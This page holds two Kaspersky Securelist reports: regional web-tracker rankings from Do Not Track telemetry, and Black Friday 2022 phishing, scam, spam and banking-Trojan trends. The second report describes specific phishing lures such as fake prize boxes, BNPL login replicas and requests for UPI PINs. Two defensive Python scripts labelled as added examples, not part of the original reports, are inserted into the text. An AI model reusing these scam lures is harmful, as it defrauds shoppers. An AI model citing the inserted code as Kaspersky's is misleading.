Kaspersky Securelist


Who tracked internet users in 2021–2022

25 November 2022, 09:00

Every time you go online, someone is watching you. The services you use, the websites you visit, the apps on your phone, smart TVs, gaming consoles and any other networked devices collect data on you with the help of trackers embedded in web pages or in software. The websites and services send this data to the manufacturers and partners whose trackers they use. Companies are after all kinds of information: device specifications, the way you use a service, the pages you open. The data helps them, firstly, to understand their customers better and improve their products by analyzing how they are used and, secondly, to predict user needs and possibly even shape them. Besides, the more an organization knows about you, the better it can personalize the ads it shows you, and personalized ads command higher rates than random ones and therefore generate higher profits.

Understanding who is collecting the data and why requires free time and knowing where to look. Most services publish privacy policies, which should ideally explain in detail what data the service collects and why. Sadly, these policies are seldom transparent enough. Worried about this lack of transparency, users and privacy watchdogs have put pressure on technology companies, and certain tech giants have started adding tools to their ecosystems that are meant to make data collection more transparent. For example, on iOS an app downloaded from the App Store that wants to track the user across other companies' apps and websites must ask for permission through a system prompt (App Tracking Transparency). However, not every service provides this kind of warning, and you will not see a prompt like that when visiting a website, even on an Apple device.

Browser privacy settings and special extensions that recognize tracking requests from websites and block them can protect you from tracking as you surf the web. That is how our Do Not Track (DNT) component works. Furthermore, with the user's consent, DNT collects anonymized data on which tracking requests are being blocked and how frequently. This report looks at the companies that collect, analyze and store user data and share it with partners, as observed through DNT.

Statistics collection principles

This report uses anonymized statistics collected between August 2021 and August 2022 by the Do Not Track component, which blocks web trackers from loading. The data was provided voluntarily by users. For nine regions and several individual countries, we compiled a list of the 25 tracking services that DNT detected most frequently. In each case, 100% represents the total number of DNT detections triggered by those 25 tracking services, not all DNT detections, so the shares below are relative to each region's TOP 25 rather than absolute detection volumes.
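As an added illustration of the two steps behind these figures (classifying an outgoing request as a tracker, then expressing each service's detections as a share of the TOP N total), the following Python is example code written for this page, not Kaspersky's Do Not Track implementation. The host-to-service mapping is an assumption (a hand-picked handful of well-known tracker hosts, not the report's detection rules), and the request list is constructed sample data.

```python
"""Toy model of tracker-request classification and share computation.

Added example, not Kaspersky's Do Not Track implementation. The host-to-service
mapping is an assumption: a hand-picked subset of well-known tracker hosts, not
the report's detection rules. The request list is constructed sample data.
"""
from collections import Counter
from typing import Dict, Iterable, Optional
from urllib.parse import urlsplit

# Assumed mapping: tracker host suffix -> service name as used in the report.
TRACKER_DOMAINS: Dict[str, str] = {
    "google-analytics.com": "Google Analytics",
    "doubleclick.net": "Google Marketing Platform (ex-DoubleClick)",
    "googlesyndication.com": "Google AdSense",
    "connect.facebook.net": "Facebook Custom Audiences",
    "criteo.com": "Criteo",
    "criteo.net": "Criteo",
    "mc.yandex.ru": "Yandex.Metrika",
}


def classify(url: str) -> Optional[str]:
    """Return the tracking service a request belongs to, or None for first-party
    and unknown hosts. Matching follows the '||domain^' rule of common blocklists:
    the host itself or any subdomain of it, never a mere substring (so
    'notdoubleclick.net' does not match 'doubleclick.net')."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    for suffix, service in TRACKER_DOMAINS.items():
        if host == suffix or host.endswith("." + suffix):
            return service
    return None


def tracker_shares(urls: Iterable[str], top_n: int = 25) -> Dict[str, float]:
    """Count blocked requests per service and express the top_n services as
    percentages of their combined total, the normalisation the report uses
    (100% = all detections of the TOP 25 services, not all requests)."""
    counts = Counter(s for s in map(classify, urls) if s is not None)
    top = counts.most_common(top_n)
    total = sum(n for _, n in top)
    if total == 0:
        return {}
    return {service: round(100.0 * n / total, 2) for service, n in top}


# Constructed sample of requests a page load might issue (not real telemetry).
SAMPLE_REQUESTS = [
    "https://news.example/index.html",
    "https://cdn.news.example/app.js",
    "https://www.google-analytics.com/collect?v=1&tid=UA-0",
    "https://www.google-analytics.com/g/collect?v=2",
    "https://securepubads.g.doubleclick.net/gampad/ads",
    "https://ad.doubleclick.net/ddm/activity/",
    "https://stats.g.doubleclick.net/j/collect",
    "https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js",
    "https://connect.facebook.net/en_US/fbevents.js",
    "https://static.criteo.net/js/ld/publishertag.js",
]

if __name__ == "__main__":
    for service, share in tracker_shares(SAMPLE_REQUESTS).items():
        print(f"{share:6.2f}%  {service}")
```

Two points the code makes explicit: suffix matching is anchored at a label boundary, so a host that merely contains a tracker name is not counted, and the percentages are normalised to the TOP N total, which is why a region with many competing trackers shows a smaller share for each of them even if absolute volumes are similar.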

DNT (disabled by default) is part of Kaspersky Internet Security, Kaspersky Total Security, and Kaspersky Security Cloud.

Global web tracking giants

Six tracking services made the TOP 25 rankings in each of the regions at hand. Four of them are owned by Google: Google Analytics, Google AdSense, Google Marketing Platform, and YouTube Analytics. The remaining two are owned by Meta and Criteo, which we will cover later.

Google

Our last report, published in 2019, took a close look at Google’s trackers: DoubleClick, Google AdSense, Google Analytics, and YouTube Analytics. This was right around the time when the search giant announced plans to rebrand the DoubleClick advertising platform and merge it with its advertising ecosystem. Today, DoubleClick is part of Google Marketing Platform, although the tracking URLs have not changed and continue to function as before. For convenience, our statistics will refer to that tracking service as “Google Marketing Platform (ex-DoubleClick)”.

Share of DNT detections triggered by Google Marketing Platform (ex-DoubleClick) trackers in each region, August 2021 — August 2022

Google Marketing Platform (ex-DoubleClick) had its largest shares in the regional TOP 25 rankings for South Asia (32.92%) and the Middle East (32.84%), followed by Africa (25.37%) and Latin America (24.64%). Its lowest share, just 7.05%, was observed in the CIS.

A further tracking service operated by Google, Google Analytics, collects data on website visitors and provides detailed statistics to clients. That service, too, accounts for a fairly large share of DNT detections across the world.

Share of DNT detections triggered by Google Analytics trackers in each region, August 2021 — August 2022

A look at the share of Google Analytics in various regions will reveal a similar pattern to the Google Marketing Platform (ex-DoubleClick). Google Analytics received its largest shares of detections in South Asia (18.04%), Latin America (17.97%), Africa (16.56%) and the Middle East (16.44%). Its smallest share was in the CIS: 9.06%.

Share of DNT detections triggered by Google AdSense trackers in each region, August 2021 — August 2022

Another tracking system operated by Google is Google AdSense, a contextual advertising service. It, too, had its highest percentages in the Middle East (5.27%), Africa (4.63%), Latin America (4.44%) and South Asia (4.44%), and the CIS again ranked last, with just 1.45% of detections triggered by the service.

Rounding out the list of Google’s tracking services is YouTube Analytics. It provides YouTube bloggers with data on their audiences that its trackers collect and analyze.

Share of DNT detections triggered by YouTube Analytics trackers in each region, August 2021 — August 2022

The Middle East (8.04%), South Asia (7.79%), Africa (5.97%) and Latin America (5.02%) again accounted for the highest shares of detections. At the bottom of the region list this time is North America (1.82%) rather than the CIS (2.54%). The low percentage does not mean that YouTube has an insignificant presence in the region; the small share of YouTube Analytics there is more likely due to fierce competition among services that collect and analyze data, which we will revisit below.

Meta (Facebook)

Facebook Custom Audiences by Meta, a targeted advertising service, was present in each of the regions alongside Google's tracking services. Services like this collect various types of user data, analyze them and segment the audience for better ad targeting: an advertiser using a targeting service has its products shown to the people likeliest to be interested. Compared to smaller advertising providers, Facebook Custom Audiences reaches a significantly larger audience. Our data shows, however, that Meta was second to Google in terms of presence in every region of the world.

Share of DNT detections triggered by Facebook Custom Audiences trackers in each region, August 2021 — August 2022

Facebook Custom Audiences had its largest shares in Latin America (8.76%) and Oceania (7.95%), and its smallest, in the CIS (2.12%). As mentioned above, the modest shares occupied by the global trackers could be linked to serious competition from local data collection and analysis services.

Criteo

The last on the list of tracking services detected in every corner of the world was Criteo. Though a less familiar name than Google or Facebook, Criteo actually is a major French advertising company providing a range of services from collection and analysis of user data to advertising itself.

Share of DNT detections triggered by Criteo trackers in each region, August 2021 — August 2022

Criteo trackers were most frequently detected in Europe (7.07%), East Asia (6.09%), and Latin America (5.24%), and least frequently, in South Asia (just 1.59%).

Regional landscape

In addition to the tracking services detected everywhere in the world, there were players of comparable size that did appear in most, but not all, TOP 25 rankings and local giants that dominated individual regions or countries. We will cover these below.

Europe

The aforementioned global tracking services held the top three places in Europe: Google Marketing Platform (ex-DoubleClick) (21.39%), Google Analytics (15.23%), and Criteo (7.07%). Facebook Custom Audiences was fifth, with 5.29%, Google AdSense was seventh, with 3.59%, and YouTube Analytics eleventh, with 2.97%. Trackers owned by five other major companies occupied the fourth, sixth, eighth, ninth, and tenth positions in our rankings.

TOP 25 tracking services in Europe, August 2021 — August 2022

Amazon Technologies, which accounted for 6.31% of total detections associated with prevalent trackers in Europe, stands for trackers operated by Amazon Advertising, an Amazon subsidiary that collects and analyzes user data to help its clients reach consumers, in addition to placing ads across Amazon services. This is essentially a classic advertising giant similar to Google Marketing Platform and Criteo. Amazon trackers will come up more than once in other regional TOP 25 rankings.

Index Exchange, the Canada-based global advertising marketplace with a 4.12% share in Europe, is another such giant.

Bing Ads, with a share of 3.45%, was another tracking service popular in the region. It provides search query analysis and displays ads in the Bing search engine. It was followed by Adloox (3.21%), which we covered in the previous review, and Improve Digital (3.17%), a Dutch advertising platform.

Facebook was the fifteenth most popular tracking service in the region, with 1.96%. This is another Meta service, which tracks Facebook account activity, such as logins and interaction with plugins and Like buttons on other websites. The service features in the TOP 25 of almost every region, with the exception of North America, Russia and Iran.

Certain tracking services, such as Meetrics (DoubleVerify), with a share of 1.28%, and Virtual Minds, with a share of 1.39%, feature in the European TOP 25 only. This is hardly surprising, as both companies are headquartered in Germany.

Africa

The familiar advertising giants occupied the top four positions in Africa. Google Marketing Platform (ex-DoubleClick) had a huge share of 25.37%. Google Analytics was second, with 16.56%. YouTube Analytics and Facebook Custom Audiences were detected in 5.97% and 5.90% of total cases, respectively.

TOP 25 tracking services in Africa, August 2021 — August 2022

The fifth place was taken by Yahoo Web Analytics, with a share of 4.86%. This is a service that collects and analyzes data on Yahoo users. The presence of Yahoo Web Analytics in a regional TOP 25 is an indication that Yahoo services are popular in that region.

It is worth noting that the African TOP 25 included no tracking service that was popular exclusively in that region.

The Middle East

The six global tracking services occupied the top six positions in the Middle East. Google Marketing Platform (ex-DoubleClick) accounted for almost one-third (32.84%) of the total detections of the region's most popular tracking services. Google Analytics trackers were detected in 16.44% of cases; YouTube Analytics trackers, in 8.04%; and Google AdSense trackers, in 5.27%. Google is evidently the biggest collector of user data in the Middle East.

TOP 25 tracking services in the Middle East, August 2021 — August 2022

There is a certain country in the region whose TOP 25 statistics we would like to consider separately because of a unique advertising market and hence, an online tracking landscape different from the rest of the Middle East.

Iran

Iran is the only country on our list where a single service, Google Analytics, accounted for more than half (50.72%) of the total detections associated with the 25 leading tracking services. Google Marketing Platform (ex-DoubleClick) accounted for 11.76%.

TOP 25 tracking services in Iran, August 2021 — August 2022

Iran also has local tracking services that internet users there encounter fairly often. For instance, the advertising agency SabaVision, with a share of 4.62%, was third in the rankings and the advertising platform Yektan was fifth, with 3.90%.

Latin America

The tracking landscape in Latin America was not drastically different from the rest of the world. Again, Google, Facebook, and Criteo occupied the leading positions. They were followed by Yahoo Web Analytics (3.48%), trackers operated by the US analytics company Chartbeat (3.00%), Twitter (2.65%), and Amazon Technologies (2.62%).

TOP 25 tracking services in Latin America, August 2021 — August 2022

North America

The share of Google’s global tracking services was comparatively small in North America, as the charts in the first part of this report show. Google Marketing Platform (ex-DoubleClick) accounted for 18.22% of total detections in August 2021 — August 2022, which was the second smallest figure in terms of its regional shares. The North American share of YouTube Analytics trackers was their smallest altogether. This was due to the heavy presence of trackers operated by other companies: Amazon Technologies (6.90%), Yahoo Web Analytics (5.67%), and Adloox (5.57%). These companies created a more competitive environment, which resulted in the share of each tracking service in the total DNT detections being smaller.

TOP 25 tracking services in North America, August 2021 — August 2022

In addition to other regions’ leaders, the North American TOP 25 featured a few that only made the local rankings. Examples included the Canadian advertising ecosystem Sharethrough with a share of 1.99% and the American advertising company The Trade Desk, which accounted for 1.65% of the detections.

Oceania

Every well-known global web tracking service was represented in Oceania. Interestingly, Oceania and North America were the only two regions where trackers by Tremor Video, a company that specializes in video advertising, made their way into the TOP 25, with shares of 1.15% and 2.54%, respectively.

TOP 25 tracking services in Oceania, August 2021 — August 2022

The CIS

The CIS (Commonwealth of Independent States) is a fairly interesting region that has a variety of local tracking services. It comprises diverse countries, each with its distinctive internet regulations and restrictions, which certainly affects the presence of advertising companies. We will start by looking at the aggregate statistics for the CIS exclusive of Russia, as that country dominates the market, distorting other countries’ statistical data somewhat.

TOP 25 tracking services in the CIS (excluding Russia), August 2021 — August 2022

The CIS was the only region at hand dominated by a local internet giant rather than Google Marketing Platform (ex-DoubleClick). Yandex.Metrika, with a share of 19.24%, topped the rankings of trackers popular in the region. Google's tracking services occupied second and third places: Google Marketing Platform (ex-DoubleClick) with 16.17% and Google Analytics with 13.14%.

The Mediascope research company was fourth, with 5.55%. Besides collecting and analyzing user data for marketing purposes, Mediascope is the organization officially designated to measure television channel audiences and to report to Roskomnadzor, Russia's mass media regulator.

Other tracking services specific to the CIS are the web counter Yadro.ru (4.88%), the ad management platform AdFox (4.68%), Russian ad tech company Buzzoola (3.03%), the ad management and audit service Adriver (2.74%), Between Digital (2.23%), Rambler Internet Holdings (1.95%), VK (ex-Mail.Ru Group, 1.92%), VKontakte (1.86%), AdMixer (1.70%), originally from Russia but now headquartered in London, and Uniontraff.com (1.03%).

Thus, 12 out of 25 most widely used web tracking services in the CIS (exclusive of Russia) were endemic to the market.

Russian Federation

Most of the tracking services that made the TOP 25 in Russia are homegrown. Yandex.Metrika and Mediascope, mentioned above, were first and second, with 19.73% and 12.51% respectively. Google Analytics (8.83%) and Google Marketing Platform (ex-DoubleClick, 6.59%) occupied the third and fourth positions, shares that are fairly low compared with their figures for the CIS excluding Russia (13.14% and 16.17% respectively). The rest of the top positions went to local Russian tracking services.

TOP 25 tracking services in Russia, August 2021 — August 2022

East Asia

The East Asian landscape did not differ drastically from the rest of the world. It featured mostly the same tracking services as other parts of the globe. However, there were two exceptions: Japan and Korea. We singled out these countries as separate research entities to demonstrate their distinctive features and the maturity of local advertising companies, which were, by and large, the key user data collectors and analysts there.

Google Marketing Platform (ex-DoubleClick) featured quite prominently in the East Asian TOP 25 rankings with a 27.62% share, followed by Google Analytics (16.13%) and Facebook Custom Audiences (6.65%). YouTube Analytics had a share of 6.54%, and Yahoo Web Analytics, 5.79%.

TOP 25 tracking services in East Asia (excluding Japan and Korea), August 2021 — August 2022

Japan

Japan is the only country where Twitter trackers had a fairly high share (11.67%), overtaking both Facebook Custom Audiences (4.43%) and YouTube Analytics (3.24%). Similarly to other major social networks, Twitter tracks user activity on other websites in addition to its own. One of the tracking tools is Twitter Pixel, which owners can embed into their websites. Twitter trackers notably featured in the TOP 25 rankings of every region and country covered by the report, with the exception of Russia, where this service is blocked.

TOP 25 tracking services in Japan, August 2021 — August 2022

In addition to the global companies, the TOP 25 rankings for Japan featured local tracking services. Examples include trackers operated by Japanese marketing and advertising agencies such as Digital Advertising Consortium Inc (3.01%), Supership (2.86%), I-mobile (2.13%), AdStir (1.44%), Samurai Factory (0.99%) and Logly (0.90%), as well as the blogging platform Ameba (1.47%) and the online services vendor LINE Corporation (0.71%).

South Korea

Like Japan, South Korea is a distinctive market with mature local tech companies, which affects tracker distribution. Google led by a fairly wide margin: Google Marketing Platform (ex-DoubleClick) had a share of 25.49% and Google Analytics 19.74%. Trackers operated by Kakao, Korea's largest internet company, accounted for as much as 10.90%, putting it in third place. Kakao's scale of operations is comparable to Japan's LINE, Russia's Yandex or China's WeChat.

TOP 25 tracking services in South Korea, August 2021 — August 2022

Other Korean tracking services in the TOP 25 were eBay Korea (2.02%) and the targeted advertising service WiderPlanet (1.77%).

South Asia

The South Asian TOP 25 rankings of web tracking services most frequently detected by DNT looked similar to the general global pattern. As in the Middle East, Google Marketing Platform (ex-DoubleClick) had one of the highest shares globally in South Asia, 32.92%.

TOP 25 tracking services in South Asia, August 2021 — August 2022

The Indian tech and media giant Times Internet, which was not part of the TOP 25 in any other region of the world, had some presence in South Asia (0.97%).

Conclusion

There are only a few global companies that collect user data in every corner of the world. They are the universally recognized Google and Meta, as well as the advertising giant Criteo, little known to common users. We have seen that the more distinctive the region or country is linguistically, economically, and technologically, the higher the chances are that local companies will have some presence on the market and be able to compete with the global giants. Major local players typically go beyond just advertising and marketing to be providers of diverse online services on their home markets. For example, Korea’s Kakao, Japan’s LINE, and Russia’s Yandex are not just internet giants but key regional services that provide the population with all that it needs: from email and instant messaging to food delivery. As they collect and analyze user data, they naturally pursue the same objectives as the global giants.

Being aware that your online activity is tracked is no fun. Unfortunately, you cannot fully protect yourself against tracking; you can only minimize the amount of data that a company tracking you obtains. That is still worthwhile: the less information about you is collected beyond your control, the less damage a future leak can do. There are various types of technical tools to protect you from web tracking. A VPN hides your real IP address from the sites you visit, which distorts, to a degree, the digital profile that marketing companies strive to build, although it does nothing against cookies or browser fingerprinting, which identify you regardless of your address. Anti-tracking browser extensions and components like DNT block trackers while you surf the web, preventing companies from finding out what websites you use and how. You can also reduce the risk by sharing only the data that services need to function. That will not stop them from collecting your data, but it can significantly reduce the scope of the information that companies hold about you.

Black Friday shoppers beware: online threats so far in 2022

23 November 2022, 09:00

The shopping event of the year, Black Friday, is almost here, and while the big day does not officially arrive until Friday, November 25th, deals are already starting. The day kickstarts the frenzied holiday shopping season with eye-catching promotional deals that lure shoppers into spending more of their hard-earned cash. In the weeks leading up to Black Friday, we have already seen discounts reaching 70% and even 80%, grabbing the attention of millions of customers.

Today, e-commerce accounts for 21% of global retail sales, a 50% increase on pre-pandemic levels, and 94% of shoppers now do at least some of their shopping online. As the volume of purchases around Black Friday grows, cybercriminals' attention to e-commerce intensifies with it, and the risk of being scammed runs even higher. On ordinary days, a customer can easily tell that a product that is too cheap is most likely a scam; during the Black Friday sales, that gets harder. Shoppers become less vigilant and therefore an easy target for cybercriminals. That is why we constantly monitor the landscape of shopping-related cyberthreats and protect users from these risks. Here is what we have found this year.

Methodology

In this research, we analyze various types of threats, such as financial malware and phishing pages mimicking the world’s biggest retail platforms, banking and payment systems, and discuss recent trends. The threat statistics we use come from Kaspersky Security Network (KSN), a system for processing anonymized cyberthreat-related data shared voluntarily by Kaspersky users, for the period from January through October 2022. In addition, we analyzed Black Friday-related spam and phishing pages mimicking popular BNPL (buy now, pay later) services, which have proven to be particularly popular during shopping seasons like Black Friday.

Key findings

  • Over the first ten months of 2022, Kaspersky prevented 38,596,555 financial phishing attacks.
  • In 2022, the number of attacks using banking Trojans doubled when compared to the same period of 2021, reaching almost 20 million.
  • The number of financial phishing attempts for online shopping platforms (16,424,303) comprised 42.55% of all financial phishing attempts.
  • The number of phishing pages mimicking the most popular shopping platforms (Apple, Amazon, eBay, Walmart, Aliexpress, and Mercado Libre) totaled 12,787,534 in the first ten months of 2022.
  • Apple was consistently the most popular lure among online shopping platforms, with phishing attempts using its name reaching 9,858,254 in the first ten months of 2022.
  • Spam campaigns intensify as Black Friday approaches. In the first three weeks of November, Kaspersky telemetry spotted 351,800 spam emails that contained the word combination “Black Friday”. This is five times more than September’s figure.

Phishing for shopping credentials: financial threats in numbers

One of the prime threats during the shopping season is financial phishing. Kaspersky distinguishes several types of financial phishing: banking, payment system, and online store phishing. Banking phishing includes fake banking websites that cybercriminals create to mislead their victims into giving up their credentials and card details. Payment system phishing involves pages mimicking well-known payment systems, such as PayPal, Visa, MasterCard and American Express. The third type of phishing mimics online stores, such as Amazon, eBay, Aliexpress, or smaller ones.

Number of attempts to visit phishing pages using banking, online payment and online retail brands as a lure, January–October 2022

During the first ten months of 2022, Kaspersky products detected 38,596,555 phishing attacks targeting users of online shopping platforms, payment systems and banking institutions. We count one attempt to open a phishing link detected by Kaspersky as one phishing attack. Over this period, phishing attempts targeting online shopping platforms made up 42.55% of all financial phishing attempts, which is 10.19 percentage points (p.p.) higher than the share of online payment phishing (32.36%) and 17.47 p.p. higher than the share of banking phishing (25.08%). Moreover, some payment system and banking phishing cases may be related to online store phishing: for example, if a phishing or scam page mimicking Amazon redirects the user to a payment page mimicking PayPal, these two pages are categorized as online store and payment system phishing, respectively. In total, Kaspersky solutions detected 16,424,303 online store phishing attacks, 12,491,239 online payment phishing attacks and 9,681,013 banking phishing attempts. We also observed a sharp spike in the number of attacks on online store users in June–July 2022, caused by a massive phishing campaign involving a fake Apple device giveaway, which Kaspersky security solutions successfully repelled.

Number of attempts to visit phishing pages using Apple as a lure, January–October 2022

Overall, the number of phishing attacks mimicking the most popular shopping platforms (Apple, Amazon, eBay, Walmart, Aliexpress, and Mercado Libre) amounted to 12,787,534 for the ten months of 2022. The majority of these attacks targeted Apple users: 9,858,254 phishing attempts, most of them occurring during the summer campaign mentioned above.

Number of attempts to visit phishing pages using popular shopping platforms (excluding Apple) as a lure in 2022

Amazon was the second most popular lure, with phishing attempts using its name peaking in April at 342,829; in total, 2,101,599 phishing attacks exploiting the Amazon brand were detected between January and October 2022. For most of 2022, the third most popular lure was Mercado Libre. Although the marketplace is local to Latin America, cybercriminals abused it in phishing attacks notably more than global brands like eBay or Walmart. Attackers used the Mercado Libre brand most heavily during the summer, with 56,099 attempts in June and 42,862 in August, more than the summer figures for eBay, Walmart and Aliexpress. Curiously, the number of phishing sites mimicking Walmart's platform peaked in February, likely because of Valentine's Day: during that month we detected 76,618 phishing attempts abusing Walmart, 45% of all phishing attempts that targeted Walmart users in the first ten months of 2022.

“Pick a prize and cry in surprise”

A large share of fake e-commerce pages comprises scams: juicy fake offers, often made in the name of a popular brand, which draw buyers. Scam websites will typically display a discount, giveaway or another attractive deal that supposedly expires soon, urging the user to hurry while the products are free or heavily discounted. This is where cybercriminals catch customers who are hungry for freebies and fail to double-check where they are about to enter their details: on a phishing page or the official website.

A brightly colored phishing site bearing a Mercado Libre logo announces, in Spanish, "Pick a prize and cry in surprise". The surprise box can supposedly contain anything: the latest iPhone, an expensive TV set or a much-needed lawn mower for the garden. To get it, the user only needs to pay a small delivery fee. All they really get if they fall for the trick is lost money and compromised bank card details.

Fake Mercado Libre site in Spanish that reads, “Pick a prize and cry in surprise”

Cybercriminals often start spreading phishing and scam pages even before Black Friday sales begin, to squeeze as much as possible out of the shopping season. One scam site, for example, offers users early access to all Amazon deals a few days before the discounts take effect, so they can grab everything they want before other customers sweep the shelves. To get the "early access", you have to subscribe to "Amazon Prime" on the scammers' website. Paying for the subscription, however, will not get users access to Amazon's offers: instead of being first among buyers, they join the ranks of scam victims.

Users are offered early access to Amazon sales

In addition to promises of early access, attackers use other tricks to lure victims. For example, they offer eBay gift cards for free. In order to generate a gift card code, users are asked to select an amount to add to the gift card account: from $10 to $300. They will then be asked to fill out a simple survey and to pay a small fee for the card, which the scammers promise to send by email. However, victims will not get any gift cards, but just lose their money to the scammers.

Victims are promised that gift card codes will be sent to their emails, which does not happen

A promise of cashback is another kind of bait used by cyberthieves. That is how they lured victims into a phishing scheme that targeted users of the Indian payment system PhonePe. The attackers sent out text messages promising cashback to users who followed a link. The phishing page urged victims to enter their UPI PIN: the secret code that is used to confirm transactions.

Fake cashback page phishing for UPI PINs

In certain cases, cybercriminals exploited several brands with one phishing page. In the screenshot below, the fake website mimics the login page for Landesbank Berlin's Amazon.de cards. It invites users to "activate Visa Secure to pay safely with their Amazon.de Visa card". To do that, the victim needs to enter their Landesbank Berlin login credentials, which are then stolen by the attackers.

Users are prompted to log in to their Landesbank Berlin account to allegedly activate Visa Secure option

“Buy now, regret later”: phishing examples for BNPL services

“Buy now, pay later” (BNPL) services allow customers to split the cost of a purchase into several interest-free installments. These services appeal to consumers, especially youngsters, and have proven to be particularly popular during shopping days like Black Friday. Juniper Research assesses the BNPL user base at 360 million in 2022 and predicts this number to surpass 900 million globally by 2027. All of this makes BNPL an attractive target for cybercriminals.

BNPL phishing on the eve of Black Friday 2022

One of the most popular BNPL services is Affirm, with around 12.7 million active users worldwide. According to the official website, a user can shop online or in-store and pay later with the service at checkout. Another option is to request a virtual card in the app. Payments are managed in the app or online. The service offers a browser extension for Chrome.

Cybercriminals have created a nearly perfect replica of the official Affirm login page—the only difference is missing links to the privacy policy and merchant login. By creating the malicious lookalike, the attackers are trying to gain access to victims’ Affirm accounts.

Affirm phishing page

The real Affirm login page (Differences highlighted)

Another pre-Black Friday phishing site found by Kaspersky researchers spoofs an even more popular service named Afterpay (Clearpay in the U.K. and Italy), which has 20 million active users globally. Perpetrators have set up a page that mimics the official website, apparently trying to trick unsuspecting visitors into entering their bank card details, including the CVV, into a fake form.

A further example of a phishing page mimicking Afterpay is aimed at gaining access to potential victims’ accounts.

Phishing distribution

To attract potential victims to phishing pages, attackers usually send links to these pages by email. The email body employs social engineering techniques, for instance, to convince the user that they need to update their payment data, or that a lucrative deal awaits them on the phishing site. However, there are other ways of delivering phishing links, such as instant messages, social media, or SMS.

Phishing and scam: red flags

More often than not, a vigilant user can recognize phishing and scam pages. The text on the page can contain typos, while the domain name in the URL can differ from that of the official website by a few characters, contain extra words, or look totally unrelated to the brand whose users it targets. The only functional buttons are often those related to the main phishing or scam functionality: “pick your prize”, submit buttons, etc. All other buttons such as “I forgot my password”, the menu, etc. are typically unclickable or lead nowhere. That said, links to the terms of use and privacy policy in the footer of a phishing page can lead to the documents published on the original website, and thus help to conceal the website’s malicious purpose.
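As an added example (not code from the Securelist report), the following Python script turns the domain-name red flags described above into a simple triage check: it compares the registrable domain of a URL against a list of brand domains, flags typosquats that are within a couple of edits of a brand domain, and flags hosts that merely embed a brand name among extra words. The brand list, the sample URLs and the “last two labels” rule for the registrable domain are assumptions made for illustration.

```python
"""Lookalike-domain triage for suspected phishing URLs.

Added example, not code from the Securelist report. The brand list, the
sample URLs and the "last two labels" registrable-domain rule are
assumptions made for illustration.
"""
from urllib.parse import urlsplit

# Constructed brand domains a defender wants to protect (assumption).
BRAND_DOMAINS = ["affirm.com", "afterpay.com", "amazon.de", "ebay.com", "phonepe.com"]


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insertions, deletions, substitutions) between a and b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]


def registrable_domain(url: str) -> str:
    """Host's last two labels, lower-cased.

    Assumption: no multi-part public suffixes (co.uk etc.); a real tool
    should consult the Public Suffix List instead of this shortcut.
    """
    host = (urlsplit(url).hostname or "").rstrip(".")
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def classify_url(url: str, brands=BRAND_DOMAINS, max_edits: int = 2) -> dict:
    """Return a verdict for one URL based only on its host name.

    legitimate    - registrable domain is exactly a brand domain
    lookalike     - registrable domain is within max_edits of a brand domain
    brand-in-name - a brand word appears among extra words in the host
    unrelated     - none of the above (the page may still be malicious;
                    the path and query are deliberately ignored)
    """
    host = (urlsplit(url).hostname or "").rstrip(".")
    dom = registrable_domain(url)
    if dom in brands:
        return {"url": url, "verdict": "legitimate", "brand": dom}
    for brand in brands:
        if levenshtein(dom, brand) <= max_edits:
            return {"url": url, "verdict": "lookalike", "brand": brand}
    for brand in brands:
        if brand.split(".")[0] in host:
            return {"url": url, "verdict": "brand-in-name", "brand": brand}
    return {"url": url, "verdict": "unrelated", "brand": None}


# Constructed sample URLs (not real phishing sites).
SAMPLE_URLS = [
    "https://www.affirm.com/login",
    "https://affrim.com/login",
    "https://phonepe-cashback.xyz/verify",
    "https://amazon.de.account-check.com/visa-secure",
    "https://secure-login.example.net/ebay",
]

if __name__ == "__main__":
    for result in map(classify_url, SAMPLE_URLS):
        print(f"{result['verdict']:14} {result['brand'] or '-':14} {result['url']}")
```

The check deliberately looks only at the host name, so a brand name that appears only in the path (the last sample URL) is not treated as a signal, matching the observation that lookalike domains are the red flag, not the page contents. Substring matching on brand words will produce false positives on unrelated words that happen to contain them, and the edit-distance threshold should be tuned to the length of the brand names being protected.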

Spam

Despite all the benefits of online shopping, one of its most annoying downsides is finding your inbox clogged up with unsolicited email. Spam campaigns tend to intensify dramatically around the shopping and holiday seasons. From November 1 through November 17, 2022, Kaspersky telemetry recorded 351,800 emails containing the word combination “Black Friday”. This is more than five times the number of such emails recorded in October, when we saw 65,608. Compared to September, the increase is more than 32 times.

The number of spam emails containing “Black Friday”; September, October, and November 2022

When left unfiltered by antispam systems, spam is an annoyance and a waste of time. Our recent study revealed that employees who receive 30–60 external emails per day could be wasting as much as 11 hours annually looking through and identifying spam messages. For employees receiving between 60 and 100 emails a day, the figure increases to 18 hours per year, which is more than two business days.

Additionally, an important email might be lost in a deluge of spam and unintentionally deleted. Needless to say, many spam emails contain links to phishing and scam websites, or malicious attachments.

Banking Trojans go after payment credentials

Banking Trojans (bankers) are a staple in the arsenal of cyberthieves who seek to profit from the sales season. These are malicious computer programs that obtain access to confidential information stored or processed by online banking and payment systems. Bankers use webinjects and form-grabbing functionality to steal credentials, card details, or even all of the data a user enters on the target website.

After a sharp drop in banking Trojan attacks in 2021, cybercriminals reverted to using the tool heavily: from January through October 2022, Kaspersky products detected and prevented almost 20 million attacks, a 92% increase year on year.

Overall number of banking Trojan attacks, January–October 2020–2022

Conclusion

The shopping season is a profitable time not just for store owners and consumers but also for cybercrooks. Every year, we see how fraudsters step up their activities amid the sales season by exploiting the names of popular stores, retail platforms and financial services. Unfortunately, the trend is not likely to go anywhere. This means users should be prepared and know how to stay protected at least from the “traditional” types of threats we observe every year: spam, phishing, and banking Trojans.

To enjoy the best that Black Friday has to offer this year, be sure to follow a few safety tips.

  • Protect all devices that you use for online shopping with a reliable security solution.
  • Do not trust any links or attachments received by email; double-check the sender’s name and email address before opening anything.
  • Check that the online store address is correct and the page has no errors or visual defects on it before filling out any forms there.
  • In order to protect your data and finances, it is a safe practice to make sure the checkout page is secure, and there is a locked padlock icon beside the address.
  • If you want to buy something from an unfamiliar company, check customer reviews before making the decision.
